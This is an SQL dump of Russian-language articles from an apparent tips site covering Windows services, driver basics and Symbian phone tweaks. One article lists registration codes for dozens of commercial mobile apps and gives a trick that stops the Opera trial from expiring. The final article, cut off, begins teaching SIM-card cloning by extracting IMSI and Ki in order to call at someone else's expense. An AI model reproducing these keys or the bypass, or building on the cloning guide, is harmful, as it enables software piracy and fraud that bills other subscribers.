/>системы или же сетевого экрана, как правило, ведет к созданию<br />соответствующей службы. Например,<br />Agnitum Client Security Service у<br />продуктов Agnitum Ltd. – Евгений<br />Кучук).<br />NVIDIA Display Driver Service; ASP.NET State Service;<br />DHCP-клиент (позволяет компьютеру<br />получать динамический IP-адрес, а<br />также выполнять обновление DNS,<br />следовательно, выключаем, если у<br />вас нет подключения к Интернету через модем);<br />DNS-клиент (выполняет запросы на<br />соотнесение доменных имен и IP-<br />адресов, после чего сохраняет их в<br />кэше и позволяет не обращаться к<br />DNS-серверу повторно); Machine Debug Manager;<br />NetMeeting Remote Desktop Sharin<br />(служба разрешает получать доступ к<br />удаленному рабочему столу с<br />использованием ресурса NetMeeting);<br />NET Runtime Optimization Service, Office Source Engine ;<br />QoS RSVP;<br />Windows Media Player Network Sharing<br />Service ;<br />Автоматическое обновление;<br />Брандмауэр Windows/Общий доступ к Интернету (ICS);<br />Веб-клиент (данный ресурс<br />предназначен для обеспечения<br />доступа к файлам, размещенным в<br />Интернете. С помощью данной<br />службы приложения Windows способны создавать, получать доступ<br />и изменять файлы в сети Интернет);<br />Вторичный вход в систему<br />(отключаем, если вы единственный<br />пользователь на компьютере);<br />Диспетчер сетевого DDE (этот сервис организует динамический обмен<br />данными между компьютерами в<br />локальной сети, но никак не<br />затрагивает Интернет);<br />Доступ к HID-устройствам (служба<br />предназначена для поддержки клавиш быстрого доступа на<br />различных устройствах ввода или<br />управления); Координатор<br />распределенных транзакций;<br />Маршрутизация и удаленный доступ;<br />Модуль поддержки NetBIOS через TCP/IP(отключаем через Windows<br />Worms Doors Cleaner);<br />Планировщик заданий;<br />Сервер папки обмена;<br />Служба COM записи компакт-дисков<br />IMAPI (отключать, если не пользуетесь встроенными<br />возможностями Windows для записи);<br />Служба Windows Media Connect;<br />Служба восстановления системы<br />(специализированные программы<br />намного лучше); Служба времени Windows<br />(Синхронизирует время через<br />Интернет);<br />Служба загрузки изображений (WIA);<br />Служба индексирования<br />(предварительно нужно на всех дисках снять галочку, где<br />установлено "Разрешить<br />индексирование для быстрого<br />поиска". От отключения службы<br />поиск не замедляется);<br />Служба обнаружения SS (Назначение этой службы - обнаружение сетевых<br />устройств Universal Plug and Play в<br />локальной сети, таких как принтеры<br />или МФУ);<br />Служба регистрации ошибок;<br />Служба сетевого DDE; Служба шлюза уровня приложения<br />(Application Layer Service) (можно<br />отключить только на SP2),<br />Служба IPSEC (служба IPSEC<br />обеспечивает безопасность<br />протокола IP посредством проверки узлов на сетевом уровне, проверок<br />подлинности, а также управляет<br />политикой IP-безопасности);<br />Служба терминалов;<br />Совместимость быстрого<br />переключения пользователей (отключаем, если вы единственный<br />пользователь на компьютере);<br />Справка и поддержка (рекомендую<br />выставить "вручную");<br />Узел универсальных PnP-устройств;<br />Фоновая интеллектуальная служба передачи (BITS);<br />Центр обеспечения безопасности;<br />Remote Registry - Удаленный реестр<br />(если стоит ОС Win XP Professional,<br />требуется обязательно отключить, по<br />причине того, что служба позволяет полностью управлять компьютером<br />по сети).<br />Все изменения заработают после<br />перезагрузки системы.<br />Вот такими способами можно<br />обезопасить свой компьютер от вирусов и сетевых атак. И конечно, не<br />следует забывать об антивирусе и<br />фаерволле, управлении cookies, а<br />также контролировать автозапуск<br />программ в Windows.","Безопасность в твоих руках.<br />Конфигурирование MS Wi","gazeta/img_334006.png","1375057986","4");
INSERT INTO gazeta_article VALUES("118","21","Прежде, чем хвататься за описание<br />самого драйвера, давайте<br />определимся с типами существующих<br />драйверов.<br />По существующему в DDK разделению сам Microsoft подразделяет драйвера<br />на следующие типы:<br />- Kernel-Mode Drivers;<br />- Kernel Streaming Drivers;<br />- Graphics Drivers;<br />- Network Drivers; - Virtual Device Drivers.<br />С графическими и сетевыми<br />драйверами более менее понятно по<br />названию.<br />Виртуальные VDD относятся к<br />устройствам, нуждающимся в работе под MS-DOS.<br />А вот два первых типа мы разберем<br />немного подробнее.<br />На рисунке видна структура всех<br />драйверов типа Kernel-Mode Drivers. В<br />иерархии этой системы различают драйвера для работы на верхнем<br />уровне(high-level), промежуточные<br />(intermediate) и низкого уровня (low-<br />level).<br />К первому относятся драйвера<br />файловый систем (FAT,NTFS), ко второму - драйвера фильтры,<br />драйвера виртуальных дисков, I/O<br />устройств, а к третьему - драйвера<br />непосредственно работающие на<br />уровне прерываний.<br />Kernel Streaming Drivers - это в первую очередь драйвера устройств видео и<br />аудио потока.<br />Немного лирики. По сути все<br />драйвера, работают на уровне kernel,<br />поэтому такое деление, лично я,<br />считаю не оправданным, но раз создатели говорят "есть контакт",<br />нам придется "есть контакт".<br />Более подробную информацию по<br />разделению на типы, и их описание<br />можно найти в Help DDK идущего в<br />поставке DDK, и устанавливаемому вместе с этим пакетом.<br />Отступим от абстрактной<br />классификации, и перейдем к более<br />земным вещам.<br />Опишем среднестатистическую<br />структуру драйвера. Каждый драйвер является набором<br />функций, встраивающихся при<br />инсталляции в структуру Windows<br />машины, и выполняемых при<br />возникновении определенного<br />события. По сути - это функции конечного автомата Windows<br />которые обязаны соответствовать<br />определенному формату.<br />В каждом драйвере есть входная<br />точка, соответствующая функции<br />main( ), в замечательном С, WinMain() в Windows. Функция вызывается при<br />старте системы автоматически в<br />момент инициализации<br />обслуживающей части Windows к<br />которой относится данный драйвер.<br />Функции выхода нет. Еще чуть-чуть лирики. В нашей с<br />вами ситуации дистанционного<br />общения, придется брать и писать<br />один из драйверов для примера. Без<br />этого будет сложновато объяснить,<br />что мы делаем и зачем. Поэтому я предлагаю выбрать некий тип для<br />нашего примера.<br />Так как большая часть драйверов<br />работает для поддержки и<br />управления реального физического<br />устройства, предположить, что у всех вас есть одинаковая плата или<br />одинаковый дисковод, было бы<br />верхом глупости.<br />Отбросив таким образом драйвера,<br />который привязаны к железке мы<br />остановимся на типе Network - сетевых драйверах.<br />Сетевые драйвера.<br />Сетевые драйвера тоже как и<br />драйвера типа kernel, делятся на<br />такие же три уровня. Вспомните, что<br />все разделение я назвал условным. Меняется только название.<br />- Miniport drivers;<br />- Protocol drivers;<br />- Intermediate drivers.<br />Структура сетевой части драйверного<br />поголовья, похожа на пирог. Давайте посмотрим как это выглядит.<br />На рисунке четко видно, как<br />структура NDIS (Network Driver<br />Interface Specification) пронизывает<br />все слои драйверного пирога.<br />Теперь давайте представим как проходит пакет от пользовательской<br />аппликации к посылке через модем<br />или сетевую карту в сеть. Все<br />клиенты Microsoft, такие как браузер<br />IE, или Outlook, пользуются одним и<br />тем же слоем библиотек, откликающихся на имя транспортные<br />библиотеки.<br />Главным в этом семействе является<br />библиотека сокетов. Про то как она<br />работает вы прочитаете в наших<br />выпусках посвященных Winsock. В любом случае библиотека, оформив<br />запрос отправляет его в NDIS, и о нем<br />совершенно забывает. В структуре<br />нашего пирога, главным<br />управляющим звеном является как<br />раз NDIS. Этот цербер распределяет кому и как передать пакет.<br />Собственно драйвер в сети<br />встроенный в NDIS предоставляет<br />управленцу все необходимые<br />прототипы функций. Начав с первого<br />типа, протокольного, пакет проходит через слой промежуточных<br />драйверов и попадает в драйвер<br />модема (Miniport - это слово я на<br />русский затруднился перевести в<br />контексте, пусть так и останется).<br />Собственно драйвера протокольного уровня - это сам транспортный стек, а<br />промежуточного - это обычные<br />фильтры.<br />Для нас важно, что промежуточный<br />драйвер не привязан ни к<br />оборудованию, ни к какому либо стандарту Windows, но соответствует<br />своей структурой любому сетевому<br />драйверу.<br />Поэтому в качестве примера мы<br />выберем именно его.<br />В следующей части я более подробно разберу, как работает вся система<br />сетевых драйверов, с упором в<br />сторону промежуточного типа<br />драйверов. И затрону сам текст<br />драйвера с конкретными примерами.<br />Мы напишем функцию входа в драйвер.","Как писать драйвера (часть 2)","gazeta/img_804640.png","1375058134","4");
INSERT INTO gazeta_article VALUES("119","20",""Cекретные" коды в программах<br />X-plore, ProfiMail и Slick (все<br />актуально для версий 1.21, 2.86 и<br />0.37 соответственно) для тех, кто<br />еще не знает...<br />Коды набирается при просмотре окна "О программе"<br />Код 800 - для увеличения<br />диапазона размеров шрифта<br />интерфейса<br />( изначально в настройках<br />доступно 0-3) после ввода этого кода в<br />настройках будет доступно<br />изменение размера от 0 до 10<br />при использовании FontRouter<br />становится доступным наклонный<br />шрифт (в общем, полная поддержка стороннего шрифта,<br />загруженного на смарте)<br />вернуть на стандарт можно<br />повторным введением 800<br />Код 900 - "You know" (на экране<br />появляется окно с загадочной информацией :-)<br />Код 901 - сбрасывает<br />регистрацию в программах<br />Код 902 - "синий экран смерти",<br />советую не набирать, нервы<br />берегите :-) (после перезапуска все ок)",""Секретные" коды в программах X-<br />plore, ProfiMail и","gazeta/img_792566.png","1375058299","4");
INSERT INTO gazeta_article VALUES("120","21","Handy.<br />Handy Alarm -=-=-=-=-=-=<br />92614417-96088820;<br />Handy Blacklist -=-=-=-=-=-<br />51511177-96501615;<br />Handy Calculator -=-=-=- 50522172-34853372;<br />Handy Clock -=-=-=-=-=-<br />60625677-94643268;<br />Handy Converter -=-=-=-<br />60625677-94643268;<br />Handy Essentials -=-=-=- 18784835-17778024;<br />Handy Expense -=-=-=-=-<br />18559656-45333692;<br />Handy Keylock -=-=-=-=-=<br />14234382-81390665;<br />Handy Profiles -=-=-=-=-=- 83111355-32491943;<br />Handy Safe -=-=-=-=-=-=-<br />94730270-40004711;<br />Handy Taskman -=-=-=-=-<br />78153743-85702535;<br />Handy Tools Pro -=-=-=-= 33589822-35668411;<br />Handy Weather -=-=-=-=-=<br />46948416-40618149;<br />Handy Zip -=-=-=-=-=-=-=<br />28050650-46459539;<br />Serius Best. Best Alarms -=-=-=-=-=-=-=-=-=-=-=-<br />82412374;<br />Best Birthday -=-=-=-=-=-=-=-=-=-=-<br />51675970;<br />Best Blacklist -=-=-=-=-=-=-=-=-=-=-<br />90441177; Best Calc -=-=-=-=-=-=-=-=-=-=-=-=-<br />97091842;<br />Best Callback -=-=-=-=-=-=-=-=-=-=-<br />61088241;<br />Best CallRecorder -=-=-=-=-=-=-=-=<br />23694502; Best Crypto -=-=-=-=-=-=-=-=-=-=-=<br />32325346;<br />Best FsClock -=-=-=-=-=-=-=-=-=-=-<br />25073310;<br />Best Full Screen Caller -=-=-=-=-=-<br />81032236; Best Joter -=-=-=-=-=-=-=-=-=-=-=-=<br />33105443;<br />Best Kamasutra -=-=-=-=-=-=-=-=-=-<br />18422645;<br />Best KeyLocker -=-=-=-=-=-=-=-=-=<br />25074640; Best Massage Storer -=-=-=-=-=-=-=<br />19013034;<br />Best PhotoRite -=-=-=-=-=-=-=-=-=-=-=-<br />99999;<br />Best Profiles -=-=-=-=-=-=-=-=-=-=-=<br />10391842; Best Safe -=-=-=-=-=-=-=-=-=-=-=-=-<br />47786911;<br />Best TaskMan -=-=-=-=-=-=-=-=-=-=-<br />33105443;<br />Best Answering Machne v.2.05 -=-=-<br />16883802; Best Ball v.1.0 -=-=-=-=-=-=-=-=-=-=-<br />90041118;<br />Best Call Cheater v.1.02 -=-=-=-=-=-<br />74608434;<br />Best Car v.1.04 -=-=-=-=-=-=-=-=-=-=<br />59168030; Best Desk v.1.03 -=-=-=-=-=-=-=-=-=<br />63208434;<br />Best Dictaphone v.1.04 -=-=-=-=-=-=<br />43726486;<br />Best eBible v.1.03 -=-=-=-=-=-=-=-=-<br />47766890; Best eBook v.1.03 -=-=-=-=-=-=-=-=-<br />47766890;<br />Best FileMen v.1.03 -=-=-=-=-=-=-=-<br />63208434;<br />Best Lock v.1.06 -=-=-=-=-=-=-=-=-=-<br />11442258; Best Notes v.1.01 -=-=-=-=-=-=-=-=-=<br />86002714;<br />Best Phone Reminder v.1.0 -=-=-=-=-<br />63208434;<br />Best Portfolio v.1.0 -=-=-=-=-=-=-=-<br />32325346; Best RandomRingtone v.1.0 -=-=-=-=<br />32325346;<br />Best SmsMachine v.1.02 -=-=-=-=-=-=<br />16882662;<br />Best Torch v.1.01 -=-=-=-=-=-=-=-=-<br />28283802; Best VideoRingtone v.1.0 -=-=-=-=-=<br />32325346;<br />Best Full Screen Caller v.3.04 -=-=-<br />15482662;<br />Best Google Earth Companion v.1.0 -<br />90041118; Best SpaseCraft v.1.01 -=-=-=-=-=-=<br />32325346;<br />Best Stacker v.3.0 -=-=-=-=-=-=-=-=<br />74608434;<br />Best Ball v.1.0 -=-=-=-=-=-=-=-=-=-=-<br />90041118; Serius Raznoe.<br />Splash Photo -=-=-=-=-=<br />SPXU-20-131237-730;<br />KavMobile v.6.0 - AAAAA-AAAAA-AAAAA-<br />AAAA3;<br />KavMobile v.7.0.32 PPPPP-PPPPP-PPPPP- PPPPY;<br />SmartMovie -=-=-=-=-=-=-=-=-=-=-=-=-<br />=- 30926;<br />AudioCube -=-=-=-=-=-=-=-=-=-=-=-=-=-<br />=- 2207;<br />Power Movie -=-=-=-=-=-=-=-=-=-=-=-=- 47283;<br />Mobile Walet -=-=-=-=-=-=-=-<br />012912714945386;<br />CorePlayer v.1.20 -=-=-=-=-=-=-=-=-=-=-<br />=-=-=- 2004T0-<br />RGC1B0-0V4000-000000-0000TT; LCG Jucebox v.2.17 -=-=-=-=-=-=-=-=-=-=<br />0000;<br />Winamp Mobile -=-=-=-=-=-=-=-=-=-=-=-<br />=-=- 255;<br />Bowling 2003 v.1.0.0 -=-=-=-=<br />041120458153958; irRemote v.0.97 -=-=-=- 1] 918199155;<br />2] 21394;<br />MP3_Player -=-=-=-=-=-=-=-=-=-=-=-=-=-<br />42152;<br />MP3GO -=-=-=-=-=-=-=-=-=-<br />0525784904261264; Multi Media Player -=-=-=-=-=-=-=-<br />365512283;<br />Photo Editor v.1.00 -=-=-=-=-=-=-=-=-=-<br />A2GHM;<br />SkyForce -=-=-=-=-=-=-=-=-=-=-=-=-=-=-<br />13907; Tags v.2.00 (UIQ) -=-=-=-=-=-=-=-=-=-=-<br />= 3835;<br />Task Manager -=-=-=-=-=-=-=-=-=<br />490227220;<br />irRemote v.1.03 -=-=-=-=-=-=-=-=-=-=<br />25929508; Tracker v.1.01 -=-=-=-=-=-=-=-=-=-=<br />59168030;<br />UltraMP3 v.1.21 -=-=-=-=-=-=-=-=-=-=-<br />=-= 18688;<br />ZipMan v.1.20 -=-=-=-=-=-=-=-=-=-=-=-<br />522571; Li-Nugz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<br />02028;<br />Blazar -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-<br />41895;<br />Quarts v.1.0 -=-=-=-=-=-=-=-=-=-=-=-=-<br />29876; Quartz2 v.1.20 -=-=-=-=-=-=-=-=-=-=-=-<br />= 36949;<br />Quarts v.1.20 -=-=-=-=-=-=-=-=-=-=-=-=<br />36949;<br />Resco Photo Viever v.4.30.3 -=-=-=-=-=-<br />41286; Resco News v.1.11 -=-=-=-=-=-=-=-=-=-<br />=- 43302;<br />AG BMI Calculator v.1.01 -=-=-=-=-=-=-=-<br />19864;<br />AG mNote v.1.01 -=-=-=-=-=-=-=-=-=-=-<br />=- 02912; SBSH Papyrus v.1.1.02 -=-=-=-=-=-<br />jfGznkg9gS;<br />Low Memory Tester v.2.33 -=-=-=-=-=-=-<br />65181;<br />Phone Number Rectifier v.1.11 -=-=-=-=-<br />20970; Punch 2 Go v.1.03 -=-=-=-=-=-=-=-=-=-<br />=- 09071;<br />Screen Capture v.1.37 -=-=-=-=-=-=-=-=<br />60772;<br />Task List v.1.03 -=-=-=-=-=-=-=-=-=-=-=<br />29688; X-Plore v.1.21 -=-=-=-=-=-=-=-=-=-=-=-<br />=-= 11061;<br />CoolTelSymbPlayer v.1.0 -=-=-=-=-=-=-=<br />02086;Low Memory Tester v.2.33 -=-=-<br />=-=-=-= 20860;<br />Phone Nummber Rectifier v.1.11 -=-=-=- = 12323;<br />Wib Software Screen Capture v.1.37 -=-<br />24457;<br />Wib Software Task List v.1.03 -=-=-=-=-<br />62472;<br />UnrealPlayer v.1.01 -=-=-=-=-=-=-=-=-=- 35760;<br />MathZ v.1.00 =-=-=-=-=-=-=-=-=-=-=-<br />38430229;<br />SkyRaider v.1.02 -=-=-=-=-<br />0649740159721984;<br />WorldMate v.1.00 -=-=-=-=-=-=-=-=-=-=- = 19638;<br />ZenoMorph v.1.00 -=-=-=-=-=-=-=-<br />5185824865;<br />Active Desk v.1.51 -=-=-=-=-=-=-=-=-<br />49716251;<br />Extended File Manager -=-=-=-=-=- 293419412;<br />Multi Media Player -=-=-=-=-=-=-=-<br />365512283;<br />System Tools v.1.31 -=-=-=-=-=-=-=-=<br />55293114;<br />Steel Warrior v.1.00 -=-=-=-=-=-=-= 564568363;<br />Geopor v.1.00 -=-=-=-=-=-=- 1] AXLVA;<br />2] 49129;<br />Cosmic Fighter v.1.00 -=-=-=-=-=-=-=-=-<br />9WYQB;<br />TTI Football v.1.01 -=-=-=-=-=-=-=-=-=- =- 2868;<br />SeeThru Keyboard v.1.00 -=-=-=-=-=-=-<br />40904;<br />miniGPS v.1.21 -=-=-=-=-=-=-=-=-=-=-<br />446118021;<br />Nightmare v.1.02 -=-=-=-=-=- 972522890350107;<br />ALON MP3 Dictaphon v.1.15 -=-=-=-=-=-<br />=-=-=-=- 4BXPX8DA4K7ODPNEC2R28;<br />NTorch Litle -=-=-=-=-=-=-=-=-=-=-=-=-<br />25600;<br />Real Dice Spades v.1.11 -=-=-=-=-=-=-=- 29627;<br />--------------------------------------------------<br />-------<br />Длиная Регестрацыя Приложений<br />------ ------<br />Pocket Oxford English Dictionary (UIP) : -=-=-=-=- Unique ID (C):32313; -=-=-<br />-=-=-=-=- 1.Info: Product ID (MSDict): -=-<br />=-<br />-=-=-=-=- 4172-D529-80A4-10BA; -=-=-<br />-=-=-=-=- Code: C750-30F2-E4D0-AFAA; -<br />=-=- -=-=-=-=- 2.Info:ProductID(Dictionary): -<br />=-=-<br />-=-=-=-=- 3615-F860-A1F0-918C; -=-=-<br />-=-=-=-=- Code: E5D2-3E02-26CD-FF20; -<br />=-=-<br />-------------------------------------------------- -------<br />Opera v.8.65 (S60) :<br />-=-=-=-=- Запускаем програму X-Plore -<br />=-=-=-<br />-=-=-=-=- ^Путь^: -=-=-=-=- viger.dat> и<br />ставим [6] -=-=-=- -=-=-=-=- Только Чтение,после етого -<br />=-=-=-<br />-=-=-=-=- триал не истикает. -=-=-=-<br />--------------------------------------------------<br />------<br />VeriChat v.1.77 (S60) - (UIP) : -=-=-=-=- Registration ID: 7150258704;<br />-=-=-=-<br />-=-=-=-=- Code: 935454918564766; -","регестрационные коды многих програм","gazeta/img_934291.png","1375058485","4");
INSERT INTO gazeta_article VALUES("121","21","Bo-пepвыx, нyжнo знaть кyдa<br />ycтaнoвлeнa тeмa, кoтopyю вы<br />coбиpaeтecь yдaлить. Ecли тeмa<br />ycтaнoвлeнa нa кapтy пaмяти, тo<br />зaxoдим в Е:\private\10207114\import<br />\ здecь нaxoдятcя вce ycтaнoвлeнныe нa кapтy пaмяти тeмы.<br />Зaxoдитe в кaждyю пaпкy и<br />oткpывaйтe фaйл c<br />paзpeшeниeм .mbm , кoгдa вы<br />yвидитe кapтинкy из тeмы кoтopyю<br />вы xoтитe yдaлить, (ecли вы oткpыли фaйл mbm и тaм нeпoнятнaя<br />кapтинкa, тo oткpoйтe фaйл c<br />paзpeшeниeм .skn в HEX, cпpaвa<br />cмoтpитe нaзвaниe тeмы). Teпepь этy<br />пaпкy yдaляйтe пoлнocтью. Ecли жe<br />тeмa ycтaнoвлeнa нa диcкe C: тo вы зaxoдитe в тe жe пaпки ,чтo и нa<br />диcкe E: и дeйcтвyйтe тeм жe<br />мeтoдoм.<br />Дaлee зaxoдитe в E:/sys/install/<br />sysregistry/a00000eb, тaм бyдyт<br />лeжaть фaйлы c paзpeшeниeм .ctl .Oткpывaeм кaждый<br />фaйл в HEX, тeпepь cпpaвa мoжнo<br />paзглядeть нaзвaниe тeмы, ищeтe<br />кaкoe вaм нaдo. Итaк вы нaшли фaйл<br />(.ctl) в кoтopoм ecть нaзвaниe вaшeй<br />тeмы, зaпoмнитe нaзвaниe этoгo фaйлa<br />(тoчнee пocлeднюю цифpy-в<br />нaзвaнии идyт нyли, a в кoнцe кaкaя<br />тo дpyгaя цифpa) пoтoм yдaляйтe eгo.<br />Дaлee зaxoдим в E:\sys\uninstall, тaм<br />ecть пaпки a00000eb......и идyт цифpы, тeпepь ищитe пaпкy гдe ecть<br />нaзвaниe кoтopoe вы зaпoминaли<br />(нaпpимep: a00000eb_00000007),<br />тeпepь yдaляйтe этy пaпкy.<br />Дaлee мы пepexoдим нa диcк C:<br />\ .Зaxoдим в c:\sys\install\sisregistry \a00000eb\ в этoй пaпкe бyдyт<br />лeжaть фaйлы c paзpeшeниями .ctl<br />и .reg , ищитe фaйлы c имeнeм<br />кoтopoe вы зaпoмнили. C тaким<br />имeнeм бyдyт двa фaйлa .reg и .ctl -<br />yдaляйтe иx oбa. Haкoнeц зaxoдитe в пaпкy uninstall,<br />тaм ищитe тaкyю жe пaпкy, кaкyю вы<br />yдaлили в e:\sys\uninstall.<br />Teпepь xвocтoв oт этoй тeмы нeт и ee<br />мoжнo пocтaвить eщe paз (ecли вы<br />coбиpaeтecь cтaвить этy тeмy cpaзy жe пocлe ee yдaлeния, тo cнaчaлa<br />пepeзaгpyзитe тeлeфoн ).","Удаление тем и их хвостов os 9.x","gazeta/img_177714.png","1375058596","4");
INSERT INTO gazeta_article VALUES("122","20","(-1) Not Found: не удалось найти<br />заданный объект;<br />(-2) General: общая ошибка;<br />(-3) Cancel: операция была отменена;<br />(-4) NoMemory: недостаточно памяти;<br />(-5) Not Supported: запрошенная операция не поддерживается;<br />(-6) Argument: неправильный запрос;<br />(-7) Total Loss Of Precision: полная<br />потеря точности;<br />(-8) Bad Handle: неправильный<br />объект; (-9) Overflow: вышел за пределы;<br />(-10) Underflow: под потоком;<br />(-11) Already Exists: уже существует;<br />(-12) Path Not Found: не удалось найти<br />указанную папку;<br />(-13 )Died:закрыто; (-14) In Use: указанный объект в<br />настоящее время используется<br />другой программой;<br />(-15) Server Terminated: сервер<br />закрылся;<br />(-16) Server Busy: сервер занят; (-17) Completion: ошибка<br />завершения;<br />(-18) Not Ready:не готов;<br />(-19) Unknown: неизвестная ошибка;<br />(-20) Corrupt: испорчено;<br />(-21) Access Denied: доступ закрыт; (-22) Locked: заблокировано;<br />(-23) Write: не удается записать;<br />(-24) Dis Mounted: неправильный<br />порядок дисков;<br />(-25) Eof: неожиданный конец файла;<br />(-26) Disk Full: диск заполнен; (-27) Bad Driver: неправильный<br />драйвер устройства;<br />(-28) Bad Name: неверное имя;<br />(-29) Comms Line Fail: неверная линия<br />файла;<br />(-30) Comms Frame: создает ошибку; (-31) Comms Overrun: захват ошибки;<br />(-32) Comms Parity: ошибка четности;<br />(-33) Timed Out: время вышло;<br />(-34) Could Not Connect: сбой при<br />подключении;<br />(-35) Could Not Disconnect: не удалось разъединить;<br />(-36) Disconnected:разъединено;<br />(-37) Bad Library Entry Point:<br />неправильный пункт входа<br />библиотеки;<br />(-38) Bad Descriptor: неверное описание;<br />(-39) Abort: прервано;<br />(-40) Too Big: слишком большой;<br />(-41) Divide By Zero: разделилось на<br />ноль;<br />(-42) Bad Power: заряд батареи слишком низок;<br />(-43) Dir Full: папка заполнена;<br />(-44) Hardware Not Available:<br />аппаратные средства не доступны;<br />(-45) Session Closed: сессия закрыта;<br />(-46) Permission Denied: отказанное разрешение.","Коды ошибок Symbian","gazeta/img_320267.png","1375058805","4");
INSERT INTO gazeta_article VALUES("123","20","Нужный софт:<br />X-plore, MBMTool, IDesigner, Python и<br />модули.<br />Создание скина на Smaper:<br />Берем extskin.mbm, кидаем в: !/<br />python/mbmtool/mbm, заходим в MBMTool, выбираем диск на котором<br />скин и разбираем его. Заходим в<br />IDesigner выбираем файл из: !/<br />python/mbmtool/img и<br />перерисовываем элементы. Цвета<br />текста в рамке, возле конверта. Цвета в скине:<br />1 - исходящие в чате.<br />2 - входящие в чате.<br />3 - Х-статус.<br />4 - фон вспл. окна, меню.<br />5 - бегунок в вспл. окне. 6 - ???<br />7 - ники на главной.<br />8 - группы.<br />9 - ник вверху, соединение.<br />10 - софт клавиши.<br />11 - текст в меню,окнах. 12 - текст в настр.,анкете.<br />13 - часы.<br />14 -???<br />??? - не нашел за что отвечают<br />данные точки.","Мануал по созданию скинов на<br />Smaper","gazeta/img_504048.png","1375058864","4");
INSERT INTO gazeta_article VALUES("124","20","Для этого нам нужен<br />разблокированный смарт,<br />установленный Core Player, программа<br />для рисования ImageDesigner или<br />PaintCAD. Заходим на тот диск где<br />установлен плеер, в папке /Private находим папку /20012FA6 и копируем<br />из нее файл с названием skin.cps в<br />любое удобное для вас место! Далее<br />изменяем формат данного файла на<br />ZIP, заходим в данный архив skin.zip и<br />видим там файлы формата bmp! Создаем на диске Е: папку /skin и<br />извлекаем все файлы из архива туда,<br />заходим в рисовалку и открываем<br />любой файл из этой папки, далее<br />изменяем его как вам угодно и<br />сохраняем его в этом же формате! Если у вас нет PaintCAD'а, то<br />редактируем или создаем новый<br />файл в ImageDesigner и далее через<br />программу ImageConverter<br />конвертируем свой файл в формат<br />bmp! Далее пишем название своего файла так же, как назывался файл<br />из архива и закидываем свой файл в<br />эту папку согласившись на замену!<br />Упаковываем данную папку skin в ZIP.<br />Изменяем ZIP на cps и закидываем<br />файл skin.cps обратно в !:/ Private/20012FA6/, согласившись на<br />замену! На всякий случай, сделайте<br />резервную копию родного файла,<br />чтобы можно было вернуть все на<br />свои места!","Создание графического мода на<br />CorePlayer","gazeta/img_253905.png","1375058908","4");
INSERT INTO gazeta_article VALUES("125","20","Работает на 5700 (оs 9.2) на других<br />способ тот же, но с некоторыми<br />отступлениями. Идем по пути Z:/<br />private/1020 2be9 и берем файл<br />101f8847.txt он выглядит так:<br />cenrep version 1 [owner] 0x101F4CD2 [defaultmeta] 0 [platsec] cap_<br />rd=alwayspass cap_wr= alwayspass<br />[Main] 0x1 int 0 0 cap_rd=alwayspass<br />cap_wr=alwayspass0x2 int 0 0 cap_<br />rd=alwayspass cap_wr=alwayspass0x3<br />string "" 0 cap_rd=alwayspass cap_ wr=alwayspass0x4 int 0 0 cap_<br />rd=alwayspass cap_wr=alwayspass0x5<br />int 0 0 cap_rd=alwayspass cap_<br />wr=alwayspass0x6 string "0" 0 cap_<br />rd=alwayspass cap_wr=alwaysfail0x7 int<br />1 0 cap_rd=alwayspass cap_ wr=alwayspass0x8 string "0" 16777216<br />cap_rd= alwayspass cap_<br />wr=WriteDeviceData<br />Нам нужна строка:<br />0x8 string "0" 16777216 cap_rd=<br />alwayspass cap_wr=WriteDeviceData Вот тут, "0" в ковычках, нужно<br />прописать уиды приложений через<br />запятую, которые хотим скрыть.<br />Причем его нужно редактировать<br />таким образом:<br />( 0x101f4673 - 101f4673 ) т.е. удалять "0х". Уиды можно узнать например<br />программой JbakTaskMan.<br />У нас должно получиться например<br />для 5700 так:<br />cenrep version 1 [owner] 0x101F4CD2<br />[defaultmeta] 0 [platsec] cap_ rd=alwayspass cap_wr= alwayspass<br />[Main] 0x1 int 0 0 cap_rd=alwayspass<br />cap_wr=alwayspass0x2 int 0 0 cap_<br />rd=alwayspass cap_wr=alwayspass0x3<br />string "" 0 cap_rd=alwayspass cap_<br />wr=alwayspass0x4 int 0 0 cap_ rd=alwayspass cap_wr=alwayspass0x5<br />int 0 0 cap_rd=alwayspass cap_<br />wr=alwayspass0x6 string "0" 0 cap_<br />rd=alwayspass cap_wr=alwaysfail0x7 int<br />1 0 cap_rd=alwayspass cap_<br />wr=alwayspass0x8 string "101fd693,101fd861,1000<br />5a3e,20007b09,101f8555,101f85a0,<br />102055eb,101f85c7,10281c96,1000594<br />e,10005a22,101f85a2,100058f5,10281d<br />06,10201af2,200009d1,101f6de4,<br />10005234,10208a86,101f4673" 16777216 cap_rd=alwayspass cap_<br />wr=WriteDeviceData.<br />Сохраняем и ложим в С:/<br />private/10202be9 и перезагружаем<br />телефон. Чтоб вернуть все обратно,<br />просто удаляем этот текстовой файл","Скрытие ненужных иконок в меню","gazeta/img_768541.png","1375058957","4");
INSERT INTO gazeta_article VALUES("126","20","Должен быть полный доступ к<br />системным папкам.<br />1. Копируем с диска: Z:/<br />private/10202be9/101F8763.txt на<br />диск: С:/<br />private/10202be9/101F8763.txt . 2. После чего редактируем этот<br />текстовый файл любым текстовым<br />редактором и меняем в нем путь к<br />мелодии. Там будет такая строчка: Z:\<br />\Data\\Startup_tone.aac. Изменяете ее<br />на любой другой путь, например так: E:\\Sounds\\Simple\\Sound.mp3.<br />3. Сохраняете текстовый файл.<br />Кидаете в: Е:/Sounds/Simple/мелодию<br />с названием Sound.mp3(если ее там<br />нет). Мелодию желательно брать<br />длительностью не более 10-ти секунд.<br />Выключаете и включаете смарт, и у<br />вас новая мелодия при включении!<br />Не забудьте включить<br />предупредительные сигналы в<br />настройках профиля, в противном случае мелодия играть не будет.","Замена мелодии при включении<br />смарта","gazeta/img_373055.png","1375059027","4");
INSERT INTO gazeta_article VALUES("127","20","Вы когда-нибудь подумывали о<br />разговорах по мобильнику за чужой<br />счет или о том, чтобы иметь на одной<br />симке несколько операторов? Если<br />да, то эта статья для вас. Я научу вас,<br />как делать дубликаты SIM-карт. Для эмуляции симки нужно достать<br />из нее регистрационные данные -<br />международный идентификатор<br />абонента или IMSI (International<br />Mobile Subscriber Identity) и<br />индивидуальный ключ аутентификации абонента или KI (Key<br />Individual). Ключи KI и IMSI хранятся<br />на SIM-карте в закрытой области<br />памяти, т.е. внешнего доступа к ним<br />нет. Остальные данные, такие как<br />телефонная книга, sms-ки и прочее хранится в защищенной области<br />памяти, которая может быть<br />защищена только PIN кодом.<br />Шифрованием занимается алгоритм<br />A3-A8, который реализован на<br />аппаратном уровне в SIM -карте. Примерно так все 